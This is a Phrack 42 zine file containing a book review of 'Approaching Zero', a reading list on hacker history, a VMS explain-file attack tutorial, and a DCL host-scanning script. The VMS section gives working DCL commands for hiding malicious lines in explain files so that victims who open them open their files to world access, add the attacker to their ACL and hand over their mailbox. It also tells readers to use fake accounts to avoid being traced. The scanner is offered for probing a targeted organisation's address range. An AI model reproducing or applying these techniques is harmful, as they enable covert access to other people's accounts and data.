mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
929 lines
41 KiB
Text
929 lines
41 KiB
Text
![]() |
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Four, Issue Forty-Two, File 5 of 27
|
|||
|
|
|||
|
|
|||
|
// // /\ // ====
|
|||
|
// // //\\ // ====
|
|||
|
==== // // \\/ ====
|
|||
|
|
|||
|
/\ // // \\ // /=== ====
|
|||
|
//\\ // // // // \=\ ====
|
|||
|
// \\/ \\ // // ===/ ====
|
|||
|
|
|||
|
(cont)
|
|||
|
|
|||
|
******************************************************************************
|
|||
|
|
|||
|
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
|
|||
|
'` '`
|
|||
|
`' Approaching Reality: `'
|
|||
|
'` ~~~~~~~~~~~~~~~~~~~~ '`
|
|||
|
`' A review of the new book Approaching Zero `'
|
|||
|
'` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '`
|
|||
|
`' by Aleph One `'
|
|||
|
'` ~~~~~~~~~~~~ '`
|
|||
|
`' `'
|
|||
|
'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
|
|||
|
|
|||
|
When I started to read this book, I expected to read one more of the
|
|||
|
series of books that claim to be the "definitive history of the computer
|
|||
|
underworld" and the "first book to define the technological subculture of
|
|||
|
phreaking, hacking, and virus writing". After all what does a guy that
|
|||
|
writes for GQ, The Hollywood Reporter, Variety and Time know about the
|
|||
|
computer underground? Well to my surprise the authors, Paul Mungo and
|
|||
|
Bryan Clough (a member of the Virus Strategy Group, which is coordinated by
|
|||
|
New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting
|
|||
|
the facts as they are. For the first time I heard a reporter and a
|
|||
|
computer crime expert give real figures at how much computer crime has
|
|||
|
really cost. Other than a few minor technical errors and the fact that
|
|||
|
they fail to mention some people and groups (especially in the virus
|
|||
|
section), the book was enjoyable to read.
|
|||
|
|
|||
|
The book covers the history of the underground starting with its
|
|||
|
beginnings in the 60's, from phreaking to the adventures of Captain
|
|||
|
Crunch and the rest of the bunch to the not so long ago Operation Sundevil
|
|||
|
and the raids all over the country on members of the LOD, MOD and DPAC.
|
|||
|
It also goes through the events that led to the German hackers spy trials,
|
|||
|
and to the new generation of virus writers that are creating the new kind
|
|||
|
of living organisms that roam cyberspace. They also discuss the gray
|
|||
|
scale that categorizes hackers, from the good hackers to the bad to the
|
|||
|
ones not that bad... those who are in it for profit and those who are
|
|||
|
in it to learn. Hopefully all the readers of the book, hackers, security
|
|||
|
specialists, reporters and the general public will get a better
|
|||
|
understanding of what motivates hackers to do what they do by learning
|
|||
|
where they come from. To the hackers let them learn not to repeat their
|
|||
|
past errors.
|
|||
|
|
|||
|
|
|||
|
I hope that the time of raids and sting operations has passed, but
|
|||
|
the late developments in the Washington 2600 meeting have pulled a shadow
|
|||
|
over my hopes. Has no one learned? Have the SS and FBI nothing better to
|
|||
|
do? Just a few moths back someone pulled one of the greatest scams of all
|
|||
|
by setting up a fake ATM and stealing a few thousand dollars. These are
|
|||
|
the kind of people the authorities should be after. And to the hacker,
|
|||
|
don't sell yourself! Remember this is a learning trip, once you start
|
|||
|
forgetting to learn and start making money out of it, it is just another
|
|||
|
job, an illegal one at that.
|
|||
|
|
|||
|
Approaching Zero was an exciting and interesting surprise. It has
|
|||
|
given me the hint that maybe someone out there understands and I hope that
|
|||
|
everyone that reads it (and you must, you must read and learn all you can)
|
|||
|
will also understand. I just leave you with these words: Hacking comes
|
|||
|
from the heart - sometimes in the form of an obsession, sometimes in the
|
|||
|
form of a hobby - once that dies, there is nothing left to do. No more
|
|||
|
traveling trough the nets! No more exploring new systems! You might as
|
|||
|
well turn the power off.
|
|||
|
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
What fallows is a list of books, papers and articles for those that
|
|||
|
want to know a little more of how the media portrays us, and a little more
|
|||
|
about the story of hacking in general.
|
|||
|
|
|||
|
|
|||
|
Books:
|
|||
|
~~~~~~
|
|||
|
|
|||
|
- "Approaching Zero" by Paul Mungo & Bryan Clough. Random House
|
|||
|
1992.
|
|||
|
|
|||
|
- "Beating the System" by Owen Bowcott & Sally Hamilton. London:
|
|||
|
Bloomsbury, 1990.
|
|||
|
|
|||
|
- "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand
|
|||
|
Rapids, MI: Abacus, 1988.
|
|||
|
|
|||
|
- "The Hackers' Handbook" by Hugo Cornwall. London: Century
|
|||
|
Communications, 1985.
|
|||
|
|
|||
|
- "Computers Under Attack" by Peter Denning. Addison Wesley, 1990.
|
|||
|
|
|||
|
- "Profits of Deceit" by Patricia Franklin. London: William
|
|||
|
Heinemann, 1990.
|
|||
|
|
|||
|
- "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate,
|
|||
|
1991.
|
|||
|
|
|||
|
- "Out of the Inner Circle" by Bill Landreth (aka The Cracker).
|
|||
|
Redmond, WA.: Tempus Books, 1985.
|
|||
|
|
|||
|
- "Sillicon Valley Fever" by Judith K. Larsen & Everett M. Rogers.
|
|||
|
London: George Allen & Unwin, 1985.
|
|||
|
|
|||
|
- "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books,
|
|||
|
1988.
|
|||
|
|
|||
|
- "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989.
|
|||
|
|
|||
|
- "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin,
|
|||
|
1990.
|
|||
|
|
|||
|
- "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983.
|
|||
|
|
|||
|
- "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992.
|
|||
|
|
|||
|
- "The Little Black Book of Computer Viruses" by Mark Ludwig. American
|
|||
|
Eagle Publications, 1991.
|
|||
|
|
|||
|
- "Artificial Life" by Steven Levy. Panthenon, 1992. (For those virus
|
|||
|
writers out there, use your tallen to create life.)
|
|||
|
|
|||
|
|
|||
|
Articles & Papers:
|
|||
|
~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
- "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review,
|
|||
|
Fall 1990: 44-57.
|
|||
|
|
|||
|
- "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates.
|
|||
|
Virus Bulletin, March 1991: 15-17.
|
|||
|
|
|||
|
- "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990.
|
|||
|
|
|||
|
- "In Defense of Hackers" by Craig Bromberg. The New York Times
|
|||
|
Magazine, April 21, 1991.
|
|||
|
|
|||
|
- "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin,
|
|||
|
December 1990: 9-11.
|
|||
|
|
|||
|
- "Voice Mail Computer Abuse Prosecution: United States v. Doucette
|
|||
|
a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the
|
|||
|
Fourth Annual Computer Virus & Security Conference, 1991, Organized
|
|||
|
by National Computing Corporation.
|
|||
|
|
|||
|
- "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time,
|
|||
|
September 26, 1988: 63.
|
|||
|
|
|||
|
- "Data Exchange and How to Cope with This Problem: The Implication
|
|||
|
of the German KGB Computer Espionage Affair" by Hans Gliss. Paper
|
|||
|
presented at Securicom Italia, October 1989.
|
|||
|
|
|||
|
- "The Implications of the SPANet Hack." Computers Fraud & Security
|
|||
|
Bulletin, Vol. 10, No. 2, 1987.
|
|||
|
|
|||
|
- "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers
|
|||
|
& Security, August 1988: 367-370.
|
|||
|
|
|||
|
- Computer Viruses - A Post Modern." Computer & Security, April 1988:
|
|||
|
117-184.
|
|||
|
|
|||
|
- "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December
|
|||
|
1990.
|
|||
|
|
|||
|
- "The Social Organization of the Computer Underground" by Gordon R.
|
|||
|
Meyer. M.A. Thesis Submitted to the Graduate School, August 1989.
|
|||
|
|
|||
|
- "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130.
|
|||
|
|
|||
|
- "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October
|
|||
|
1971, Collected in Travels with Dr. Death. New York: Viking Penguin,
|
|||
|
1991.
|
|||
|
|
|||
|
- "The Worm Program - Early Experience with a Distributed
|
|||
|
Computations" by John F. Shoch. Communications of the ACM, Vol. 25,
|
|||
|
No. 3, March 1982.
|
|||
|
|
|||
|
- "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin,
|
|||
|
February 1991: 6-7.
|
|||
|
|
|||
|
- "Crisis and Aftermath" by Eugene H. Spafford. Communications of the
|
|||
|
ACM. Vol. 32, No. 6, June 1989.
|
|||
|
|
|||
|
- "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector,
|
|||
|
September 1991: 1.
|
|||
|
|
|||
|
- "Stalking the Wily Hacker" by Clifford Stoll. Communications of the
|
|||
|
ACM. Vol. 31, No. 5, May 1988.
|
|||
|
|
|||
|
- "The Kinetics of Computer Virus Replication." by Peter S. Tippett.
|
|||
|
FundationWare, March 1990.
|
|||
|
|
|||
|
- "The General and Logical Theory of Automata" by John L. von Neumann.
|
|||
|
Hixon Symposium, September 1948.
|
|||
|
|
|||
|
- "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993:
|
|||
|
58-65.
|
|||
|
|
|||
|
- "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62.
|
|||
|
|
|||
|
- "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by
|
|||
|
Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June
|
|||
|
1989.
|
|||
|
|
|||
|
- "Viruses and Criminal Law" by Michael Gemignani. Communications of
|
|||
|
the ACM. Vol. 32, No. 6, June 1989.
|
|||
|
|
|||
|
- "Password Cracking: A Game of Wits" by Donn Seeley. Communications
|
|||
|
of the ACM. Vol. 32, No. 6, June 1989.
|
|||
|
|
|||
|
- "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg,
|
|||
|
David Gries, Juris Artmanis, Don Holcomb, M. Stuart Lynn & Thomas
|
|||
|
Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989.
|
|||
|
|
|||
|
- "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing,
|
|||
|
May 1989: 247-248.
|
|||
|
|
|||
|
- "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January
|
|||
|
1982: 58-64.
|
|||
|
|
|||
|
- "Trouble in Cyberspace" by Willard Uncapher. The Humanist,
|
|||
|
September/October 1991: 5-14,34.
|
|||
|
|
|||
|
- "Is Computer Hacking a Crime?" Capture of a discussion held on the
|
|||
|
WELL. Harper's Magazine, March 1990: 45-57.
|
|||
|
|
|||
|
- "The United States vs. Craig Neidorf" by Dorothy E. Denning.
|
|||
|
Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32.
|
|||
|
|
|||
|
- "Colleagues Debate Denning's Comments." Communications of the ACM.
|
|||
|
Vol. 34, No. 3, March 1991: 33-41.
|
|||
|
|
|||
|
- "Denning's Rebutal" by Dorothy E. Denning. Communications of the
|
|||
|
ACM. Vol. 34, No. 3, March 1991: 42-43.
|
|||
|
|
|||
|
- "Coming into the Country" by John P. Barlow. Communications of the
|
|||
|
ACM. Vol. 34, No. 3, March 1991: 19-21.
|
|||
|
|
|||
|
- "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8.
|
|||
|
|
|||
|
- "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July
|
|||
|
24, 1990:27-32.
|
|||
|
|
|||
|
- "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12
|
|||
|
|
|||
|
- "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19,
|
|||
|
1991: 67-69.
|
|||
|
|
|||
|
- "Crackdown on hackers `may violate civil rights'" by Dan Charles.
|
|||
|
New Scientist, July 21, 1990: 22.
|
|||
|
|
|||
|
- "United States v. Zod." The Economist, September 1, 1990: 23.
|
|||
|
|
|||
|
- "Drop the Phone." Time, January 9, 1989: 49.
|
|||
|
|
|||
|
- "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
|
|||
|
American, May 1984: 14-21.
|
|||
|
|
|||
|
- "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
|
|||
|
American, March 1985: 14-23.
|
|||
|
|
|||
|
- "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
|
|||
|
American. March 1989: 110-113.
|
|||
|
|
|||
|
- "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science,
|
|||
|
Vol. 250: 1330.
|
|||
|
|
|||
|
- "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215,
|
|||
|
5 March, 1982: 1216-1217.
|
|||
|
|
|||
|
- "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times
|
|||
|
National, Sunday, April 19, 1992.
|
|||
|
|
|||
|
- "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business
|
|||
|
Week, December 4, 1989: 37-38.
|
|||
|
|
|||
|
- "Computer Hacking Goes to Trail" by William F. Allman. U.S. News &
|
|||
|
World Report, January 22, 1990: 25.
|
|||
|
|
|||
|
- "Morris Code: by Katie Hafner. The New Republican, February 19, 1990:
|
|||
|
15-16.
|
|||
|
|
|||
|
- "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol.
|
|||
|
340, August 3, 1989: 329.
|
|||
|
|
|||
|
- "Problems of Security" by David Lendley. Nature. Vol. 340. July 27,
|
|||
|
1989: 252.
|
|||
|
|
|||
|
- "Hostile Takeovers" by Paul Wallich. Scientific American, January
|
|||
|
1989: 22-23.
|
|||
|
|
|||
|
- "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November
|
|||
|
25, 1988: 1121-1122
|
|||
|
|
|||
|
- "Researcher Fear Computer Virus' Will Slow Use of National Network"
|
|||
|
by Calvin Sims. The New York Times, Monday, November 14, 1998: B6.
|
|||
|
|
|||
|
- "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca &
|
|||
|
Seth Shulman. Nature, Vol. 336, November 10, 1988: 97.
|
|||
|
|
|||
|
- "The Science of Computing: Computer Viruses" by Peter J. Denning.
|
|||
|
American Scientist, Vol. 76, May-June 1988:236-238.
|
|||
|
|
|||
|
- "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April
|
|||
|
8, 1991:81.
|
|||
|
|
|||
|
- "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559.
|
|||
|
|
|||
|
- "Computer System Intruder Plucks Passwords and Avoids Detection" by
|
|||
|
John Markoff. The New York Times National, Monday, March 19, 1990.
|
|||
|
|
|||
|
- "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of
|
|||
|
the day. December 15, 1991: 150-155.
|
|||
|
|
|||
|
- "Halting Hackers." The Economist. October 28, 1989: 18.
|
|||
|
|
|||
|
- "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly,
|
|||
|
January 1989: 21-24.
|
|||
|
|
|||
|
- "Greater awareness of security in aftermath of computer worm" by Seth
|
|||
|
Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301.
|
|||
|
|
|||
|
- "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May
|
|||
|
1989: 85-92.
|
|||
|
|
|||
|
*****************************************************************************
|
|||
|
|
|||
|
{----------------------------------------------}
|
|||
|
{ }
|
|||
|
{ VMS/VAX Explain Files Explained }
|
|||
|
{ or }
|
|||
|
{ Security Holes in the VAX and DCL }
|
|||
|
{ }
|
|||
|
{ By: The Arctic Knight }
|
|||
|
{ }
|
|||
|
{----------------------------------------------}
|
|||
|
|
|||
|
VAX/VMS hacking has declined in popularity over the years due to the
|
|||
|
abundance of UNIX machines now available. It has even gotten bad press from
|
|||
|
fellow hackers. Included in this file is a security hole the size of , oh,
|
|||
|
any of the older IBM mainframes. With a little curiosity, persistence, and
|
|||
|
down right stubbornness I came across this rather obvious hole in the system.
|
|||
|
However, this hole may be so obvious that it has remained relatively hidden
|
|||
|
until now, especially since the decline of DCL users.
|
|||
|
On most VAX systems, there is something called explain files. These are
|
|||
|
usually help files that are made up by the system operators or borrowed from
|
|||
|
somewhere to help better explain the way certain features of the system work,
|
|||
|
whether they be general VAX commands, or system-specific programs.
|
|||
|
When you are in your account (Presumably, a fake one, as this can be
|
|||
|
tracked down if you are foolish) type:
|
|||
|
|
|||
|
$ explain index
|
|||
|
|
|||
|
and you will get a list of all the explain files on your system. Go ahead
|
|||
|
and take a look around these just to get a feel of what it looks like. It
|
|||
|
should be a menu driven list of text files to view or programs to run(!!!).
|
|||
|
Most system operators only set this up to show various text files
|
|||
|
describing commands like mentioned above. However, DCL .com files can be run
|
|||
|
from explain files as well. Now comes the fun. Many systems will also allow
|
|||
|
users to set up there own explain file. A really nice way to make it easy for
|
|||
|
other users to view text files or run programs that you have set for group or
|
|||
|
world access.
|
|||
|
The first thing someone needs to do is make a file called INTRO.LKT which
|
|||
|
will contain whatever introduction text that you would like displayed before
|
|||
|
your explain file menu is displayed(i.e. you might have a description of
|
|||
|
yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE
|
|||
|
CONTAINED IN A TEXT FILE!!!!)
|
|||
|
You can use any editor to do this like EDT(a line editor) or TPU(a full
|
|||
|
screen editor). You will need to type something along these lines to create the
|
|||
|
file:
|
|||
|
|
|||
|
$set vt=100 !if using a full screen editor like TPU
|
|||
|
$edit/tpu intro.lkt
|
|||
|
|
|||
|
After you are finished typing in the file, if you used TPU (A much better
|
|||
|
choice than EDT), you press <CONTROL-Z> to save the file. Now you must create
|
|||
|
a file called INDEX.LKI which will contain the file directories, filenames,
|
|||
|
and short descriptions of the files that you want to have displayed. You do
|
|||
|
this in the same manner as above, by entering an editor, and creating the file.
|
|||
|
|
|||
|
$edit/tpu index.lki
|
|||
|
|
|||
|
Now, in this file the lines should look like the following:
|
|||
|
(File Directory) (Filename) (File Description)
|
|||
|
|
|||
|
Phrack41.txt A complete copy of Phrack 41 for your enjoyment.
|
|||
|
User:[aknight.hack]vms.txt A guide to hacking VMS systems.
|
|||
|
Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state.
|
|||
|
|
|||
|
Now, to explain these three lines. The first one will look for the program
|
|||
|
in your main directory. The second line will look for the program listed after
|
|||
|
it on the device called USER and in the HACK directory within the AKNIGHT
|
|||
|
directory. The final line will look on the device called TEMP$1 in the FTP
|
|||
|
directory within the AKNIGHT directory. Adding DCL programs will be explained
|
|||
|
in a minute, but first lets get this up and running.
|
|||
|
Now, that you have typed in the text files you want, and saved this file
|
|||
|
you need to set the protection on your main directory and any others that need
|
|||
|
accessing like the text files to group and world access. For the above example
|
|||
|
one would want to type(assuming you are in your main directory):
|
|||
|
|
|||
|
$set prot=(g:re,w:re) user:[000000]aknight.dir !This is my main directory
|
|||
|
$set prot=(g:re,w:re) user:[aknight.hack]
|
|||
|
$set prot=(g:re,w:re) temp$1:[000000]aknight.dir !My second storage device
|
|||
|
$set prot=(g:re,w:re) temp$1:[aknight.ftp]
|
|||
|
$set prot=(g:r,w:r) phrack41.txt !Giving privs to read only
|
|||
|
$set prot=(g:r,w:r) user:[aknight.hack]vms.txt
|
|||
|
$set prot=(g:r,w:r) temp$1:[aknight.ftp]ftplist.txt
|
|||
|
|
|||
|
Now, if you type:
|
|||
|
|
|||
|
$explain aknight ! (my username in this instance,your normally)
|
|||
|
|
|||
|
You should get a print out to screen of your INTRO.LKT file and then a
|
|||
|
message along the lines of "Hit <return> to continue". When you hit return a
|
|||
|
menu will appear very similar to the normal explain file menu except with your
|
|||
|
files listed and their descriptions which were accessed by the computer from
|
|||
|
your INDEX.LKI file. It would look like this(or something similar) in the above
|
|||
|
example.
|
|||
|
|
|||
|
{a print out of my INTRO.LKT file...}
|
|||
|
|
|||
|
Hit <RETURN> to continue
|
|||
|
|
|||
|
EXPLAIN AKNIGHT
|
|||
|
================================================================================
|
|||
|
(A) PHRACK41 T-A complete copy of Phrack 41 for your enjoyment.
|
|||
|
(B) VMS T-A guide to hacking VMS systems.
|
|||
|
(C) *EXPLAIN/USER AKNIGHT FTPLIST
|
|||
|
T-A list of FTP servers in-state.
|
|||
|
(Q) TERMINATE THIS PROGRAM
|
|||
|
================================================================================
|
|||
|
T = Text Display P = Program to be run
|
|||
|
(* = Related Information)
|
|||
|
Choose A-C, Q, oe type HELP for assistance.
|
|||
|
|
|||
|
Now you have an explain file. Pressing A-C will print those files to
|
|||
|
screen with pauses at each page if set up on your system/account to do so. I
|
|||
|
typed out number C the way I did, because when it has to access a directory
|
|||
|
other than it's main one, it will usually do this. I think there is away around
|
|||
|
this, but to be quite honest I haven't bothered figuring it out yet. When you
|
|||
|
quit, you will be dropped back off at your main prompt. The reason you need to
|
|||
|
set your protections, is because even thought from your account, it may look
|
|||
|
like it is working, if you don't set your protections as described above,
|
|||
|
NO ONE else will be able to view it!!
|
|||
|
Now, comes the fun part. Putting DCL .COM files into your explain file.
|
|||
|
These are put into your index just like any text file. So you could type up a
|
|||
|
program to let someone copy the public files you have in your account to their
|
|||
|
directory, or something similar. The security flaw comes in here and it is
|
|||
|
a big one. Since a user is accessing your explain file from their account, any
|
|||
|
file that they run, issues commands in their account. So, one might plant a
|
|||
|
line in the middle of the above program that say something like:
|
|||
|
|
|||
|
$set def sys$login !Returns them to their main directory.
|
|||
|
$set prot=(g:rwed,w:rwed) *.*;* !Their files are now read, write, execute,
|
|||
|
!and deleteable by anyone, including you.
|
|||
|
|
|||
|
Here is another idea. Say you create a text reader in DCL, to allow people
|
|||
|
to jump around in the text files you have, skip pages, etc. called TYPE.COM in
|
|||
|
your main directory. Anytime you can fool people into thinking that the
|
|||
|
computer is taking a little time to think, you can insert some major commands,
|
|||
|
i.e. when it is skipping pages, or coping files, which almost takes no time at
|
|||
|
all in reality. I STRONGLY suggest starting any program you plan to nest
|
|||
|
commands like this into with:
|
|||
|
|
|||
|
$set noverify
|
|||
|
|
|||
|
Which will make sure that the program lines don't get printed to the
|
|||
|
screen as they are running. Another important command to know is the following
|
|||
|
which will cause the next text output from the VAX to be sent to a NULL device,
|
|||
|
so it will essentially be lost and not printed to the screen. So, if one is
|
|||
|
accessing someone's mailbox, you don't want a messaging appearing on screen
|
|||
|
saying that you have entered VAX/VMS mail or whatever. The command is:
|
|||
|
|
|||
|
$assign nl:sys$output/user
|
|||
|
|
|||
|
If you forget the /user it will send the output to the null device for the
|
|||
|
session, instead of just one line.
|
|||
|
Some other things one might do would be to add yourself to someone's
|
|||
|
ACL(access control list) by typing:
|
|||
|
|
|||
|
$set acl/acl=(ident=[aknight],access=control) *.*;*
|
|||
|
|
|||
|
Now, this will give you access to all their files just as if you were the
|
|||
|
user, however if they bother to ever do a dir/prot command your username will
|
|||
|
be printed all over the screen, so one would suggest if you must do this, to
|
|||
|
use a fake account. Same with this below command:
|
|||
|
|
|||
|
$assign nl:sys$output/user
|
|||
|
$mail set write aknight
|
|||
|
|
|||
|
The second line will give me read and write access to someone's mailbox,
|
|||
|
but once again if they bother to check their mailbox protections your username
|
|||
|
will be displayed.
|
|||
|
In case, you haven't realized this yet, this all has A LOT of potential,
|
|||
|
and what I have mentioned here is just the tip of the iceberg and really mostly
|
|||
|
small and even foolish things to do, but the fact comes down to ANYTHING the
|
|||
|
user can do in their account, YOU can do in there account if you know the right
|
|||
|
commands and have the patience to nest them into a .COM file well enough.
|
|||
|
When you have created the .COM file and added it to the INDEX.LKI file,
|
|||
|
then you will need to set the protection of the file like so:
|
|||
|
|
|||
|
$set prot=(g:e,w:e) type.com !Execution only. No read privs.
|
|||
|
|
|||
|
You now have it a fully functional explain file that is only held down by
|
|||
|
your imagination.
|
|||
|
|
|||
|
Remember, malicious actions aren't the sign of a true hacker, so don't
|
|||
|
delete a users complete directory just because you want to show of your power.
|
|||
|
Most people won't be impressed. If your a SYSOP, fix this DAMN HOLE!!! And if
|
|||
|
your a user well, learn the system quickly, explore, absorb, and discover some
|
|||
|
other hole before the above SYSOP patches this one......
|
|||
|
|
|||
|
COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!!
|
|||
|
{______________________________________________________________________________}
|
|||
|
|
|||
|
*****************************************************************************
|
|||
|
|
|||
|
A Internet Scanner
|
|||
|
|
|||
|
(War Dialer)
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
MadHatter
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Purpose of this program
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Remember those scanner, war dialer programs everyone used to scan areas of
|
|||
|
telephone numbers to find unknown hosts? Well, now your on the net and you're
|
|||
|
targeting some certain establishment, and you know which part of the net they
|
|||
|
own, but the hell if you know what the actual IP addresses of their hosts are...
|
|||
|
Telneting to NIC.DDN.MIL is no help, their records are a year old... Might as
|
|||
|
well have been 10 yrs ago... So you type every possible IP address in. Right?
|
|||
|
After a while that shit gets tiring... Well, hell let the computer do it,
|
|||
|
that's what its there for. More speed, no sore fingers, no bitching, and it
|
|||
|
runs when you're not there. Almost perfect.....
|
|||
|
|
|||
|
|
|||
|
Program Details
|
|||
|
~~~~~~~~~~~~~~~
|
|||
|
DCL is the language and it runs on Vaxen. A,B,C,D respectively represent
|
|||
|
the starting IP address. E,F,G,H respectively represent the ending IP address
|
|||
|
(ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1,
|
|||
|
etc., E = 6, F = 1, etc.)
|
|||
|
The prog creates a data file (FINAL.DAT) that holds all successful
|
|||
|
connections. If you run it in batch, it also creates a .log file. This by
|
|||
|
far takes up most of the memory. When the program quits, delete it.
|
|||
|
This prog is just one big loop. It finds a good telnet address and then
|
|||
|
reIFINGERs there, saving it.
|
|||
|
|
|||
|
|
|||
|
Program Changes
|
|||
|
~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
If you run it in batch, then you might (probably) have to define where
|
|||
|
the IFINGER or FINGER program is. Make sure it is the one for FINGERing remote
|
|||
|
hosts, the commands for it vary. Why do you have to define it? Because the
|
|||
|
dumb-ass sysop couldn't think of why anyone would want to use it in batch.
|
|||
|
|
|||
|
|
|||
|
Problems
|
|||
|
~~~~~~~~
|
|||
|
|
|||
|
The IFINGER (FINGER) command might not connect to some hosts from your
|
|||
|
system. Why can you TELNET there but no IFINGER? It all probably has to do
|
|||
|
with the other host (it has tight security, too far away, doesn't support
|
|||
|
FINGERing, etc.).
|
|||
|
|
|||
|
|
|||
|
No Solutions (Just one)
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
You say if I can TELNET to more places than IFINGERing, why not base the
|
|||
|
scanner on the TELNET command? Two reasons: (1) the security with the TELNET
|
|||
|
command requires its output goes to a terminal, never to run in batch; (2) the
|
|||
|
TELNET command does not give the character address (at least not on the system I
|
|||
|
use). To have the character address is valuable to me. The program lists the
|
|||
|
IP address, the character address, then whatever finger came up with.
|
|||
|
When running in batch, the program will quit eventually (do to MAX CPU
|
|||
|
time or exceeded disk quota). This can be a pain (especially if its CPU time),
|
|||
|
you can always get more memory. Try changing the file specifics in the prog,
|
|||
|
and run many versions of it at once, to get as much cpu time as possible.
|
|||
|
For memory, clear your account, or get more of them. Another problem is when
|
|||
|
your program has stopped and you have nothing in FINAL.DAT file. So where do
|
|||
|
you start the batch off again? All I can say is count the number of failed
|
|||
|
connections and add 'em to your previous start address, start at that address.
|
|||
|
|
|||
|
|
|||
|
More Ideas
|
|||
|
~~~~~~~~~~
|
|||
|
|
|||
|
If you want the net area of an establishment then ftp to NIC.DDN.MIL and
|
|||
|
get the hosts listing, or TELNET there and search for the name.
|
|||
|
Some areas of the net do not like to be scanned. Your sysop will get nasty
|
|||
|
calls, and then you will get nasty e-mail if you for instance scan the Army
|
|||
|
Information Systems Center. Or any other government org. Of course, this
|
|||
|
program wouldn't hurt them at all, it would bounce back. They use firewalls.
|
|||
|
But they will bitch anyway.
|
|||
|
After you run this program for awhile, you'll notice the net is really
|
|||
|
a big empty place. Hosts are few and far between (at least address wise).
|
|||
|
Are you agoraphobic yet? What do you do with all this room?
|
|||
|
|
|||
|
|
|||
|
MadHatter
|
|||
|
|
|||
|
|
|||
|
*----------------------------CUT HERE------------------------------------------*
|
|||
|
$ A = 0
|
|||
|
$ B = 0
|
|||
|
$ C = 0
|
|||
|
$ D = 0
|
|||
|
$ E = 257
|
|||
|
$ F = 0
|
|||
|
$ G = 0
|
|||
|
$ H = 0
|
|||
|
$ D = D - 1
|
|||
|
$ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1
|
|||
|
$ CREATE FINAL.DAT
|
|||
|
$ LOOP1:
|
|||
|
$ ON SEVERE_ERROR THEN GOTO SKIP
|
|||
|
$ D = D + 1
|
|||
|
$ IFINGER @'A'.'B'.'C'.'D'
|
|||
|
$ ON SEVERE_ERROR THEN GOTO SKIP
|
|||
|
$ ASSIGN TEMPFILE.DAT SYS$OUTPUT
|
|||
|
$ WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]"
|
|||
|
$ IFINGER @'A'.'B'.'C'.'D'
|
|||
|
$ DEASSIGN SYS$OUTPUT
|
|||
|
$ APPEND TEMPFILE.DAT FINAL.DAT
|
|||
|
$ DELETE TEMPFILE.DAT;*
|
|||
|
$ SKIP:
|
|||
|
$ IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT
|
|||
|
